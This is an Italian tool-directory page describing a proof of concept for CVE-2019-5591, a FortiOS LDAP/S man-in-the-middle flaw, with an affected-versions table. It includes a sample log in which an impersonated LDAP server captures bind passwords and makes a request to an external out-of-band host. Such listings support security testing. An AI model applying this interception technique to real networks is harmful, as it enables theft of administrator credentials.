Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
fortios-ldap-mitm-poc-CVE-2019-5591 — La configurazione predefinita di LDAP su FortiOS v6.0.x fino a v6.2.0 non verifica l'identità del server per LDAP/S, portando ad attacchi MITM. Questo PoC dimostra la completa esfiltrazione delle credenziali inviate sulla sottorete locale a un server LDAP facilmente impersonabile. | Kitploit
Strumenti/GitHubGitHub/ayewo/fortios-ldap-mitm-poc-cve-2019-5591
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration TestingAutenticazione
GitHubayewo/fortios-ldap-mitm-poc-cve-2019-5591

fortios-ldap-mitm-poc-CVE-2019-5591

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

110 mesi faNon ancora revisionato

La configurazione predefinita di LDAP su FortiOS v6.0.x fino a v6.2.0 non verifica l'identità del server per LDAP/S, portando ad attacchi MITM. Questo PoC dimostra la completa esfiltrazione delle credenziali inviate sulla sottorete locale a un server LDAP facilmente impersonabile.

Condividi

CVE-2019-5591

Questo Proof of Concept (PoC) dimostra un attacco MITM (Man-In-The-Middle): impersonificazione di un server LDAP sulla sottorete locale di un dispositivo FortiGate che esegue una versione vulnerabile di FortiOS.

Versioni interessate

Queste versioni sono vulnerabili:

VersioneAffettaSoluzione
FortiOS 7.0Non affettaNon applicabile
FortiOS 6.0dalla 6.0.3 alla 6.2.0Aggiornare alla 6.2.1 o superiore

Rilevamento in azione

Per il PoC è stato utilizzato FortiOS 6.2.0 in esecuzione all'interno di VMware Fusion.

root@kitploit:~

[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
nLBkcjDTHC01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro

🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789

============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================

Descrizione

La configurazione predefinita di LDAP su FortiOS dalla v6.0.x alla v6.2.0 non verifica l'identità del server per LDAP/S, consentendo attacchi MITM. Questo PoC dimostra la completa esfiltrazione delle credenziali inviate sulla sottorete locale a un server LDAP facilmente impersonabile.

Scarica lo strumento